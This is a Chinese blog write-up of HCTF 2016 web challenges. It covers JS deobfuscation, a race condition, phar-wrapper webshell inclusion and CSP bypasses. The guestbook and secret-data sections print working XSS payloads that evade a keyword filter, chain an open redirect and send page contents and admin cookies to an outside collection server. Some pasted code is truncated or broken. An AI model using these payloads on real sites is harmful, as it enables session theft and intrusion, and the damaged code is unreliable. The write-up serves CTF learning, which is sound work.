hctf2016 web 部分WriteUp.md

这次是18还是19忘了,还是太菜了,level4开的太晚了,卡题卡了一晚上,队伍pwn和misc还有待提高,一道pwn都没有出,挺伤的。
补题发现要是再有三个小时,感觉大图书馆的牧羊人AT feild 能出,这样就挤进前15了。不过这次也还比较满足了,毕竟新人队伍,大家都还很菜,加上这次没有安卓。。。好吧不安慰自己了,立个flag把,下一次分站赛一定要挤进前15。

要说自己也有问题,比如最后secretdata明明做出来了,结果额外至少花费了一个小时,只是因为扫描目录的时候扫到了一个phpmyadmin,觉得主办方放一个这个东西在这里加上题目名称叫secretdata,肯定有用意,然后像个智障一样一直折腾这个网页。js发过去也没有第一时间让他回传cookie,而是让admin一直访问phpmyadmin,profile.php等等的,要是直接最开始简单点直接拿cookie登陆就好了。但是这里也发现一个问题,管理员访问user.php为什么没有flag回传给我而只是一个跟我们一样的user.php,但是最后拿到cookie登陆上去的时候flag确实在user.php里面,这一点百思不得其解。

另外这次我只做出了rsa1没有搞出rsa2也是蛮遗憾的,而且到最后也不知道rsa2该怎么做。学习之路还长着呢。慢慢来啊。

算了,赛后说啥都晚了,下次加把劲把 。另外补的题忘了写wp了,有机会再怼上把。

    • 2099年的flag
    • RESTful
    • giligili
    • 兵者多诡
    • 必须比香港记者还要快
    • guestbook
    • secret data

2099年的flag

改下请求头就行了

hctf2016 web 部分WriteUp.md_第1张图片

RESTful

根据提示要用PUT,然后得到hint说是restful架构,所以直接构造一下请求就行了。

hctf2016 web 部分WriteUp.md_第2张图片

giligili

http://lorexxar.cn/2016/04/11/sctf-Obfusion/

查看源码知道是一道js解密的题目。代码如下:


var _ = { 0x4c19cff: "random", 0x4728122: "charCodeAt", 0x2138878: "substring", 0x3ca9c7b: "toString", 0x574030a: "eval", 0x270aba9: "indexOf", 0x221201f: function(_9) { var _8 = []; for (var _a = 0, _b = _9.length; _a < _b; _a++) { _8.push(Number(_9.charCodeAt(_a)).toString(16)); } return "0x" + _8.join(""); }, 0x240cb06: function(_2, _3) { var _4 = Math.max(_2.length, _3.length); var _7 = _2 + _3; var _6 = ""; for(var _5=0; _5<_4; _5++) { _6 += _7.charAt((_2.charCodeAt(_5%_2.length) ^ _3.charCodeAt(_5%_3.length)) % _4); } return _6; }, 0x5c623d0: function(_c, _d) { var _e = ""; for(var _f=0; _f<_d; _f++) { _e += _c; } return _e; } };
            var $ = [ 0x4c19cff, 0x3cfbd6c, 0xb3f970, 0x4b9257a, 0x1409cc7, 0x46e990e, 0x2138878, 0x1e1049, 0x164a1f9, 0x494c61f, 0x490f545, 0x51ecfcb, 0x4c7911a, 0x29f7b65, 0x4dde0e4, 0x49f889f, 0x5ebd02c, 0x556f342, 0x3f7f3f6, 0x11544aa, 0x53ed47d, 0x697a, 0x623f21c1, 0x5c623d0, 0x32e8f8b, 0x3ca9c7b, 0x367a49b, 0x360179b, 0x5c862d6, 0x30dc1af, 0x7797d1, 0x221201f, 0x5eb4345, 0x5e9baad, 0x39b3b47, 0x32f0b8f, 0x48554de, 0x3e8b5e8, 0x5e4f31f, 0x48a53a6, 0x270aba9, 0x240cb06, 0x574030a, 0x1618f3a, 0x271259f, 0x3a306e5, 0x1d33b46, 0x17c29b5, 0x1cf02f4, 0xeb896b ];
            var a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, r, s, t, u, v, w, x, y, z;
            function check() {
                var answer = document.getElementById("message").value;
                var correct = (function() {
                    try {
                        h = new MersenneTwister(parseInt(btoa(answer[_[$[6]]](0, 4)), 32));
                        e = h[_[$[""+ +[]]]]()*(""+{})[_[0x4728122]](0xc); for(var _1=0; _1new MersenneTwister(e), v = true;
                        l.random(); l.random(); l.random();
                        o = answer.split("_");
                        i = l.mt[~~(h.random()*$[0x1f])%0xff];
                        s = ["0x" + i[_[$[$.length/2]]](0x10), "0x" + e[_[$[$.length/2]]](0o20).split("-")[1]];
                        e =- (this[_[$[42]]](_[$[31]](o[1])) ^ s[0]); if (-e != $[21]) return false;
                        e ^= (this[_[$[42]]](_[$[31]](o[2])) ^ s[1]); if (-e != $[22]) return false; e -= 0x352c4a9b;
                        t = new MersenneTwister(Math.sqrt(-e));
                        h.random();
                        a = l.random();
                        t.random();
                        y = [ 0xb3f970, 0x4b9257a, 0x46e990e ].map(function(i) { return $[_[$[40]]](i)+ +1+ -1- +1; });
                        o[0] = o[0].substring(5); o[3] = o[3].substring(0, o[3].length - 1);
                        u = ~~~~~~~~~~~~~~~~(a * i); if (o[0].length > 5) return false;
                        a = parseInt(_[$[23]]("1", Math.max(o[0].length, o[3].length)), 3) ^ eval(_[$[31]](o[0]));
                        r = (h.random() * l.random() * t.random()) / (h.random() * l.random() * t.random());
                        e ^= ~r;
                        r = (h.random() / l.random() / t.random()) / (h.random() * l.random() * t.random());
                        e ^= ~~r;
                        a += _[$[31]](o[3].substring(o[3].length - 2)).split("x")[1]; if (parseInt(a.split("84")[1], $.length/2) != 0x4439feb) return false;
                        d = parseInt(a, 16) == (Math.pow(2, 16)+ -5+ "") + o[3].charCodeAt(o[3].length - 3).toString(16) + "53846" + (new Date().getFullYear() - 1 + "");
                        i = 0xffff;
                        n = (p = (f = _[$[23]](o[3].charAt(o[3].length - 4), 3)) == o[3].substring(1, 4));
                        g = 3;
                        t = _[$[23]](o[3].charAt(3), 3) == o[3].substring(5, 8) && o[3].charCodeAt(1) * o[0].charCodeAt(0) == 0x2ef3;
                        h = ((31249*g) & i).toString(16);
                        i = _[$[31]](o[3].split(f).join("").substring(0, 2)).split("x")[1];
                        s = i == h;
                        return (p & t & s & d) === 1 || (p & t & s & d) === true;
                    } catch (e) {
                        console.log("gg");
                        return false;
                    }
                })();

                document.getElementById("message").placeholder = correct ? "correct" : "wrong";
                if (correct) {
                    alert("Congratulations! you got it!");
                } else {
                    alert("Sorry, you are wrong...");
                }
            };

这种题放到控制台疯狂输入输出调试就行了,也没有太多技术含量,多花些时间都能做出来的。
下面fdsa d的调试代码。


var MersenneTwister = function(seed) {

  if (seed == undefined) {

    seed = new Date().getTime();

  }

  /* Period parameters */

  this.N = 624;

  this.M = 397;

  this.MATRIX_A = 0x9908b0df;   /* constant vector a */

  this.UPPER_MASK = 0x80000000; /* most significant w-r bits */

  this.LOWER_MASK = 0x7fffffff; /* least significant r bits */



  this.mt = new Array(this.N); /* the array for the state vector */

  this.mti=this.N+1; /* mti==N+1 means mt[N] is not initialized */

  this.init_genrand(seed);

}



/* initializes mt[N] with a seed */

MersenneTwister.prototype.init_genrand = function(s) {

  this.mt[0] = s >>> 0;

  for (this.mti=1; this.mti<this.N; this.mti++) {

      var s = this.mt[this.mti-1] ^ (this.mt[this.mti-1] >>> 30);

   this.mt[this.mti] = (((((s & 0xffff0000) >>> 16) * 1812433253) << 16) + (s & 0x0000ffff) * 1812433253)

  + this.mti;

      /* See Knuth TAOCP Vol2. 3rd Ed. P.106 for multiplier. */

      /* In the previous versions, MSBs of the seed affect   */

      /* only MSBs of the array mt[].                        */

      /* 2002/01/09 modified by Makoto Matsumoto             */

      this.mt[this.mti] >>>= 0;

      /* for >32 bit machines */

  }

}



/* initialize by an array with array-length */

/* init_key is the array for initializing keys */

/* key_length is its length */

/* slight change for C++, 2004/2/26 */

MersenneTwister.prototype.init_by_array = function(init_key, key_length) {

  var i, j, k;

  this.init_genrand(19650218);

  i=1; j=0;

  k = (this.N>key_length ? this.N : key_length);

  for (; k; k--) {

    var s = this.mt[i-1] ^ (this.mt[i-1] >>> 30)

    this.mt[i] = (this.mt[i] ^ (((((s & 0xffff0000) >>> 16) * 1664525) << 16) + ((s & 0x0000ffff) * 1664525)))

      + init_key[j] + j; /* non linear */

    this.mt[i] >>>= 0; /* for WORDSIZE > 32 machines */

    i++; j++;

    if (i>=this.N) { this.mt[0] = this.mt[this.N-1]; i=1; }

    if (j>=key_length) j=0;

  }

  for (k=this.N-1; k; k--) {

    var s = this.mt[i-1] ^ (this.mt[i-1] >>> 30);

    this.mt[i] = (this.mt[i] ^ (((((s & 0xffff0000) >>> 16) * 1566083941) << 16) + (s & 0x0000ffff) * 1566083941))

      - i; /* non linear */

    this.mt[i] >>>= 0; /* for WORDSIZE > 32 machines */

    i++;

    if (i>=this.N) { this.mt[0] = this.mt[this.N-1]; i=1; }

  }

  this.mt[0] = 0x80000000; /* MSB is 1; assuring non-zero initial array */

}



/* generates a random number on [0,0xffffffff]-interval */

MersenneTwister.prototype.genrand_int32 = function() {

  var y;

  var mag01 = new Array(0x0, this.MATRIX_A);

  /* mag01[x] = x * MATRIX_A  for x=0,1 */

  if (this.mti >= this.N) { /* generate N words at one time */

    var kk;

    if (this.mti == this.N+1)   /* if init_genrand() has not been called, */

      this.init_genrand(5489); /* a default initial seed is used */

    for (kk=0;kk<this.N-this.M;kk++) {

      y = (this.mt[kk]&this.UPPER_MASK)|(this.mt[kk+1]&this.LOWER_MASK);

      this.mt[kk] = this.mt[kk+this.M] ^ (y >>> 1) ^ mag01[y & 0x1];

    }

    for (;kk<this.N-1;kk++) {

      y = (this.mt[kk]&this.UPPER_MASK)|(this.mt[kk+1]&this.LOWER_MASK);

      this.mt[kk] = this.mt[kk+(this.M-this.N)] ^ (y >>> 1) ^ mag01[y & 0x1];

    }

    y = (this.mt[this.N-1]&this.UPPER_MASK)|(this.mt[0]&this.LOWER_MASK);

    this.mt[this.N-1] = this.mt[this.M-1] ^ (y >>> 1) ^ mag01[y & 0x1];

    this.mti = 0;

  }

  y = this.mt[this.mti++];

  /* Tempering */

  y ^= (y >>> 11);

  y ^= (y << 7) & 0x9d2c5680;

  y ^= (y << 15) & 0xefc60000;

  y ^= (y >>> 18);

  return y >>> 0;

}



/* generates a random number on [0,0x7fffffff]-interval */

MersenneTwister.prototype.genrand_int31 = function() {

  return (this.genrand_int32()>>>1);

}



/* generates a random number on [0,1]-real-interval */

MersenneTwister.prototype.genrand_real1 = function() {

  return this.genrand_int32()*(1.0/4294967295.0);

  /* divided by 2^32-1 */

}

/* generates a random number on [0,1)-real-interval */

MersenneTwister.prototype.random = function() {

  return this.genrand_int32()*(1.0/4294967296.0);

  /* divided by 2^32 */

}



/* generates a random number on (0,1)-real-interval */

MersenneTwister.prototype.genrand_real3 = function() {

  return (this.genrand_int32() + 0.5)*(1.0/4294967296.0);

  /* divided by 2^32 */

}



/* generates a random number on [0,1) with 53-bit resolution*/

MersenneTwister.prototype.genrand_res53 = function() {

  var a=this.genrand_int32()>>>5, b=this.genrand_int32()>>>6;

  return(a*67108864.0+b)*(1.0/9007199254740992.0);

}

/*

CryptoJS v3.1.2

code.google.com/p/crypto-js

(c) 2009-2013 by Jeff Mott. All rights reserved.

code.google.com/p/crypto-js/wiki/License

*/

var CryptoJS=CryptoJS||function(e,m){var p={},j=p.lib={},l=function(){},f=j.Base={extend:function(a){l.prototype=this;var c=new l;a&&c.mixIn(a);c.hasOwnProperty("init")||(c.init=function(){c.$super.init.apply(this,arguments)});c.init.prototype=c;c.$super=this;return c},create:function(){var a=this.extend();a.init.apply(a,arguments);return a},init:function(){},mixIn:function(a){for(var c in a)a.hasOwnProperty(c)&&(this[c]=a[c]);a.hasOwnProperty("toString")&&(this.toString=a.toString)},clone:function(){return this.init.prototype.extend(this)}},

n=j.WordArray=f.extend({init:function(a,c){a=this.words=a||[];this.sigBytes=c!=m?c:4*a.length},toString:function(a){return(a||h).stringify(this)},concat:function(a){var c=this.words,q=a.words,d=this.sigBytes;a=a.sigBytes;this.clamp();if(d%4)for(var b=0;b>>2]|=(q[b>>>2]>>>24-8*(b%4)&255)<<24-8*((d+b)%4);else if(65535for(b=0;b4)c[d+b>>>2]=q[b>>>2];else c.push.apply(c,q);this.sigBytes+=a;return this},clamp:function(){var a=this.words,c=this.sigBytes;a[c>>>2]&=4294967295<<

32-8*(c%4);a.length=e.ceil(c/4)},clone:function(){var a=f.clone.call(this);a.words=this.words.slice(0);return a},random:function(a){for(var c=[],b=0;b4)c.push(4294967296*e.random()|0);return new n.init(c,a)}}),b=p.enc={},h=b.Hex={stringify:function(a){var c=a.words;a=a.sigBytes;for(var b=[],d=0;dvar f=c[d>>>2]>>>24-8*(d%4)&255;b.push((f>>>4).toString(16));b.push((f&15).toString(16))}return b.join("")},parse:function(a){for(var c=a.length,b=[],d=0;d2)b[d>>>3]|=parseInt(a.substr(d,

2),16)<<24-4*(d%8);return new n.init(b,c/2)}},g=b.Latin1={stringify:function(a){var c=a.words;a=a.sigBytes;for(var b=[],d=0;dString.fromCharCode(c[d>>>2]>>>24-8*(d%4)&255));return b.join("")},parse:function(a){for(var c=a.length,b=[],d=0;d>>2]|=(a.charCodeAt(d)&255)<<24-8*(d%4);return new n.init(b,c)}},r=b.Utf8={stringify:function(a){try{return decodeURIComponent(escape(g.stringify(a)))}catch(c){throw Error("Malformed UTF-8 data");}},parse:function(a){return g.parse(unescape(encodeURIComponent(a)))}},

k=j.BufferedBlockAlgorithm=f.extend({reset:function(){this._data=new n.init;this._nDataBytes=0},_append:function(a){"string"==typeof a&&(a=r.parse(a));this._data.concat(a);this._nDataBytes+=a.sigBytes},_process:function(a){var c=this._data,b=c.words,d=c.sigBytes,f=this.blockSize,h=d/(4*f),h=a?e.ceil(h):e.max((h|0)-this._minBufferSize,0);a=h*f;d=e.min(4*a,d);if(a){for(var g=0;gthis._doProcessBlock(b,g);g=b.splice(0,a);c.sigBytes-=d}return new n.init(g,d)},clone:function(){var a=f.clone.call(this);

a._data=this._data.clone();return a},_minBufferSize:0});j.Hasher=k.extend({cfg:f.extend(),init:function(a){this.cfg=this.cfg.extend(a);this.reset()},reset:function(){k.reset.call(this);this._doReset()},update:function(a){this._append(a);this._process();return this},finalize:function(a){a&&this._append(a);return this._doFinalize()},blockSize:16,_createHelper:function(a){return function(c,b){return(new a.init(b)).finalize(c)}},_createHmacHelper:function(a){return function(b,f){return(new s.HMAC.init(a,

f)).finalize(b)}}});var s=p.algo={};return p}(Math);

(function(){var e=CryptoJS,m=e.lib,p=m.WordArray,j=m.Hasher,l=[],m=e.algo.SHA1=j.extend({_doReset:function(){this._hash=new p.init([1732584193,4023233417,2562383102,271733878,3285377520])},_doProcessBlock:function(f,n){for(var b=this._hash.words,h=b[0],g=b[1],e=b[2],k=b[3],j=b[4],a=0;80>a;a++){if(16>a)l[a]=f[n+a]|0;else{var c=l[a-3]^l[a-8]^l[a-14]^l[a-16];l[a]=c<<1|c>>>31}c=(h<<5|h>>>27)+j+l[a];c=20>a?c+((g&e|~g&k)+1518500249):40>a?c+((g^e^k)+1859775393):60>a?c+((g&e|g&k|e&k)-1894007588):c+((g^e^

k)-899497514);j=k;k=e;e=g<<30|g>>>2;g=h;h=c}b[0]=b[0]+h|0;b[1]=b[1]+g|0;b[2]=b[2]+e|0;b[3]=b[3]+k|0;b[4]=b[4]+j|0},_doFinalize:function(){var f=this._data,e=f.words,b=8*this._nDataBytes,h=8*f.sigBytes;e[h>>>5]|=128<<24-h%32;e[(h+64>>>9<<4)+14]=Math.floor(b/4294967296);e[(h+64>>>9<<4)+15]=b;f.sigBytes=4*e.length;this._process();return this._hash},clone:function(){var e=j.clone.call(this);e._hash=this._hash.clone();return e}});e.SHA1=j._createHelper(m);e.HmacSHA1=j._createHmacHelper(m)})();

/* These real versions are due to Isaku Wada, 2002/01/09 added */

Array.prototype.includes||(Array.prototype.includes=function(a){"use strict";var b=Object(this),c=parseInt(b.length)||0;if(0===c)return!1;var e,d=parseInt(arguments[1])||0;d>=0?e=d:(e=c+d,0>e&&(e=0));for(var f;c>e;){if(f=b[e],a===f||a!==a&&f!==f)return!0;e++}return!1});







var _ = { 0x4c19cff: "random", 0x4728122: "charCodeAt", 0x2138878: "substring", 0x3ca9c7b: "toString", 0x574030a: "eval", 0x270aba9: "indexOf", 0x221201f: function(_9) { var _8 = []; for (var _a = 0, _b = _9.length; _a < _b; _a++) { _8.push(Number(_9.charCodeAt(_a)).toString(16)); } return "0x" + _8.join(""); }, 0x240cb06: function(_2, _3) { var _4 = Math.max(_2.length, _3.length); var _7 = _2 + _3; var _6 = ""; for(var _5=0; _5<_4; _5++) { _6 += _7.charAt((_2.charCodeAt(_5%_2.length) ^ _3.charCodeAt(_5%_3.length)) % _4); } return _6; }, 0x5c623d0: function(_c, _d) { var _e = ""; for(var _f=0; _f<_d; _f++) { _e += _c; } return _e; } };

            var $ = [ 0x4c19cff, 0x3cfbd6c, 0xb3f970, 0x4b9257a, 0x1409cc7, 0x46e990e, 0x2138878, 0x1e1049, 0x164a1f9, 0x494c61f, 0x490f545, 0x51ecfcb, 0x4c7911a, 0x29f7b65, 0x4dde0e4, 0x49f889f, 0x5ebd02c, 0x556f342, 0x3f7f3f6, 0x11544aa, 0x53ed47d, 0x697a, 0x623f21c1, 0x5c623d0, 0x32e8f8b, 0x3ca9c7b, 0x367a49b, 0x360179b, 0x5c862d6, 0x30dc1af, 0x7797d1, 0x221201f, 0x5eb4345, 0x5e9baad, 0x39b3b47, 0x32f0b8f, 0x48554de, 0x3e8b5e8, 0x5e4f31f, 0x48a53a6, 0x270aba9, 0x240cb06, 0x574030a, 0x1618f3a, 0x271259f, 0x3a306e5, 0x1d33b46, 0x17c29b5, 0x1cf02f4, 0xeb896b ];

            var a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, r, s, t, u, v, w, x, y, z;

            function check() {

        var answer ="hctf{wh3r3_iz_y0ur_neee3eeed??}"

                var correct = (function() {

                    try {

                        h = new MersenneTwister(parseInt(btoa(answer[_[$[6]]](0, 4)), 32));

                        e = h[_[$[""+ +[]]]]()*(""+{})[_[0x4728122]](0xc); for(var _1=0; _1"e:"+e);

                        l = new MersenneTwister(e), v = true;

                        l.random(); l.random(); l.random();

                        o = answer.split("_");

                        i = l.mt[~~(h.random()*$[0x1f])%0xff];

                        console.log("i:"+i);

                        s = ["0x" + i[_[$[$.length/2]]](0x10), "0x" + e[_[$[$.length/2]]](0o20).split("-")[1]];

                        console.log("s:"+s);

                        console.log(this[_[$[42]]](_[$[31]](o[1])) ^ s[0]);

                        e =-(this[_[$[42]]](_[$[31]](o[1])) ^ s[0]); if (-e != $[21]) return false;

                        console.log("e2:"+e);

                        e ^= (this[_[$[42]]](_[$[31]](o[2])) ^ s[1]); if (-e != $[22]) return false; e -= 0x352c4a9b;

                        console.log("e3:"+e);

                        t = new MersenneTwister(Math.sqrt(-e));

                        h.random();

                        a = l.random();

                        t.random();

                        y = [ 0xb3f970, 0x4b9257a, 0x46e990e ].map(function(i) { return $[_[$[40]]](i)+ +1+ -1- +1; });

                        console.log("y:"+y);



                        o[0] = o[0].substring(5);

                        o[3] = o[3].substring(0, o[3].length - 1);



                        a = parseInt(_[$[23]]("1", Math.max(o[0].length, o[3].length)), 3) ^ eval(_[$[31]](o[0]));

                        console.log("a:"+a);

                        console.log("a2:"+parseInt(_[$[23]]("1", Math.max(o[0].length, o[3].length)), 3));



                        r = (h.random() * l.random() * t.random()) / (h.random() * l.random() * t.random());

                        e ^= ~r;

                        console.log("e4:"+e);

                        r = (h.random() / l.random() / t.random()) / (h.random() * l.random() * t.random());

                        e ^= ~~r;

                        console.log("e5:"+e);

                        console.log(_[$[31]](o[3].substring(o[3].length - 2)));

                        a += _[$[31]](o[3].substring(o[3].length - 2)).split("x")[1];

                        console.log($.length/2);

                        console.log(parseInt(a, 16));

                        console.log((Math.pow(2, 16)+ -5+ "") + o[3].charCodeAt(o[3].length - 3).toString(16) + "53846" + (new Date().getFullYear() - 1 + ""));



                        if (parseInt(a.split("84")[1], $.length/2) != 0x4439feb) return false;

                        console.log(1);

                        d = parseInt(a, 16) == (Math.pow(2, 16)+ -5+ "") + o[3].charCodeAt(o[3].length - 3).toString(16) + "53846" + (new Date().getFullYear() - 1 + "");

                        i = 0xffff;

                        n = (p = (f = _[$[23]](o[3].charAt(o[3].length - 4), 3)) == o[3].substring(1, 4));

                        g = 3;

                        t = _[$[23]](o[3].charAt(3), 3) == o[3].substring(5, 8) && o[3].charCodeAt(1) * o[0].charCodeAt(0) == 0x2ef3;

                        console.log(d+n+t);



                        h = ((31249*g) & i).toString(16);

                        console.log(o[3].split(f).join("").substring(0, 2));

                        i = _[$[31]](o[3].split(f).join("").substring(0, 2)).split("x")[1];

                        console.log(h+":"+i);

                        s = i == h;

                        return (p & t & s & d) === 1 || (p & t & s & d) === true;

                    } catch (e) {

                        console.log("error!");

                        return false;

                    }

                })();

                console.log("correct:"+correct);

            };

check();

兵者多诡

这里有一个上传点,有一个文件包含点。

先利用文件包含拿到网页源码,发现直接包含上传的图片没有办法包含,那么就考虑伪协议,最后利用phar协议搞定。

创建一个0.php,写入一句话木马,然后压缩,把压缩包改名为0.png后缀上传,最后直接利用phar协议执行命令,如下图所示:

hctf2016 web 部分WriteUp.md_第3张图片

必须比香港记者还要快

一道时间竞争。

扫一下目录,发现目录下有README.md,内容如下:


# 跑得比谁都快



## ChangeLog 的故事

## 这里是加了.git之后忘删的README.md  XD by Aklis



## ChangeLog



- 2016.11.11

完成登陆功能,登陆之后在session将用户名和用户等级放到会话信息里面。

判断sessioin['level']是否能在index.php查看管理员才能看到的**东西**。

XD



- 2016.11.10

老板说注册成功的用户不能是管理员,我再写多一句把权限降为普通用户好啰。



- 2016.10

我把注册功能写好了

观察说是再写多一句把权限降为普通用户,那么很容易想到就是时间竞争,多线程登陆,然后在它还没有执行降权限时登陆上去就可以了,当时用burp直接开两个intruder,一个跑注册,一个跑登陆,然后勾选跟随重定向就可以了,线程数设大一点就能直接拿到flag`,这里最后没有截图就算了,反正也没有太多技术含量

guestbook

一道绕过CSP的题目,首先需要爆破md5,写个代码如下:


from hashlib import *

while 1:

    string=raw_input("md5: ")

    for i in xrange(100000000):

        if md5(str(i)).hexdigest()[0:4] == string:

            print str(i)

            break

然后开始尝试,发现它过滤了很多,但是规则是把像是script、on、link等都替换为空,但没有递归替换什么的,所以复写两次就能绕过过滤,然后是同源策略的问题,如下:


content-security-policy:default-src 'self'; script-src 'self' 'unsafe-inline'; font-src 'self' fonts.gstatic.com; style-src 'self' 'unsafe-inline'; img-src 'self'    

他能够执行内联脚本,然后根据链接http://lorexxar.cn/2016/08/08/ccsp/#object-src,我们知道通过能够绕过,所以我这里搞的比较复杂,我是内联执行一个js去访问页面,然后构造一个link标签herf到我的xss平台,如下:




"./js/jquery.min.js">



$.get("http://guestbook.hctf.io/admin_lorexxar.php",functioonn(data,status){

      var head = document.getElementsByTagName("body")[0];

      var cssURL="http://104.160.43.154/xss/?a="+escape(data);

      var Tag = document.createElement("lilinknk");

      Tag.href = cssURL;

      Tag.setAttribute("rel","prefetch");

      head.appendChild(Tag);

})



  • 然后去xss平台收取flag就行了,如下:

    这里写图片描述

    图中第四行就是我们的flag了。

    secret data

    又是一道绕过同源策略的题目,不过这里不能执行内联脚本了,同源策略如下:

    
    default-src 'self';
    
    script-src http://sguestbook.hctf.io/static/ 'sha256-n+kMAVS5Xj7r/dvV9ZxAbEX6uEmK+uen+HZXbLhVsVA=' 'sha256-2zDCsAh4JN1o1lpARla6ieQ5KBrjrGpn0OAjeJ1V9kg=' 'sha256-SQQX1KpZM+ueZs+PyglurgqnV7jC8sJkUMsG9KkaFwQ=' 'sha256-JXk13NkH4FW9/ArNuoVR9yRcBH7qGllqf1g5RnJKUVg=' 'sha256-NL8WDWAX7GSifPUosXlt/TUI6H8JU0JlK7ACpDzRVUc=' 'sha256-CCZL85Vslsr/bWQYD45FX+dc7bTfBxfNmJtlmZYFxH4=' 'sha256-2Y8kG4IxBmLRnD13Ne2JV/V106nMhUqzbbVcOdxUH8I=' 'sha256-euY7jS9jMj42KXiApLBMYPZwZ6o97F7vcN8HjBFLOTQ=' 'sha256-V6Bq3u346wy1l0rOIp59A6RSX5gmAiSK40bp5JNrbnw=';
    
    font-src http://sguestbook.hctf.io/static/ fonts.gstatic.com;
    
    style-src 'self' 'unsafe-inline';
    
    img-src 'self'
    

    它智能执行static的js脚本,这就比较头大了,虽然说找到一个上传点在profile.php,但是它的上传位置在upload下面,没办法直接引用。

    后来扫目录在它的static目录下发现一个redirect.php文件,参数为u,可以重定向到u指向的网页,那么就好办了,用src指向redirect.php,然后重定向到upload下我们上传的js文件就好了。

    上传的js文件如下:

    
    $.get("http://sguestbook.hctf.io/profile.php",function(data,status){
    
          var head = document.getElementsByTagName("body")[0];
    
        var cssURL="[xss平台的url地址]?a="+document.cookie+"|"+escape(data);
    
        var Tag = document.createElement("link");
    
         Tag.href = cssURL;
    
         Tag.setAttribute("rel","prefetch");
    
        head.appendChild(Tag);
    
    })
    

    我这里的js是让他顺带访问下profile.php,要是它把cookie放在profile.php里面就直接搞定了。

    payload如下:

    
    <scrscriptipt src="./static/js/jquery.min.js">scriscriptpt>
    
    <scscriptript src="static/redirect.php?u=redirect.php?u=http://sguestbook.hctf.io/upload/xxxxxxxx">scscriptript>
    

    cookie如下:

    这里写图片描述
    拿到cookie之后登陆拿到flag如下图:

    hctf2016 web 部分WriteUp.md_第4张图片

    PS:这里扫到了phpmyadmin。。。。

    你可能感兴趣的:(WriteUp,Web)